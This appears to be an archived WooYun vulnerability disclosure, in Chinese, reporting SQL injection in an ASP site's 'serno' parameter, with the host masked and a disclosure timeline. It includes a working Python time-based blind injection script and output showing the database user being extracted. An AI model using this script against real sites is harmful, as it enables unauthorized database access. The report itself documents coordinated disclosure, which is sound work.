乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-19: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经确认,细节仅向厂商公开 2016-02-01: 细节向核心白帽子及相关领域专家公开 2016-02-11: 细节向普通白帽子公开 2016-02-21: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
注入点:
http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000&serno=1192
serno存在注入正常 and 1=1 :返回正常单引号 and 1=2:返回不正常附带测试脚本
import requestsimport reimport timepayloads='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789@_.'user=''print 'Start to retrive Mysql user:'for i in range(1,23): for payload in payloads: starttime=time.time() s="19 and if(ascii(mid(user() from (%s) for 1))=%s,sleep(1),1)" %(i,ord(payload)) param={'serno':s} response=requests.get('http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000&serno=1192',params=param) if time.time()-starttime >2: user+=payload print '\n user is:',user, break else: print '.',print '\n[Done] mysql user is %s' %user
结果仅供参考
user is: E . . . . . . . . . . . . . . . . . . . . . user is: Eb . . . . user is: EbE . . . . . . . . user is: EbEI . . user is: EbEIC user is: EbEICA user is: EbEICAA . . . user is: EbEICAAD . . . . . . . . user is: EbEICAADI . . . . . . . . . . . . . . . . user is: EbEICAADIQ . user is: EbEICAADIQB . . . . . . . . . . . . . . . user is: EbEICAADIQBP . . . . . . . . . . user is: EbEICAADIQBPK . . . . . . . . . . . user is: EbEICAADIQBPKL . . . . user is: EbEICAADIQBPKLE . . . . . . . . . user is: EbEICAADIQBPKLEJ . . . . . . . . . . . . . user is: EbEICAADIQBPKLEJX . user is: EbEICAADIQBPKLEJXB . . . . . . . . . . . user is: EbEICAADIQBPKLEJXBL . . . . . . . . . . . . user is: EbEICAADIQBPKLEJXBLN . . . . user is: EbEICAADIQBPKLEJXBLNE user is: EbEICAADIQBPKLEJXBLNEA[Done] mysql user is EbEICAADIQBPKLEJXBLNEA
危害等级:高
漏洞Rank:17
确认时间:2016-01-22 00:06
感謝通報
暂无
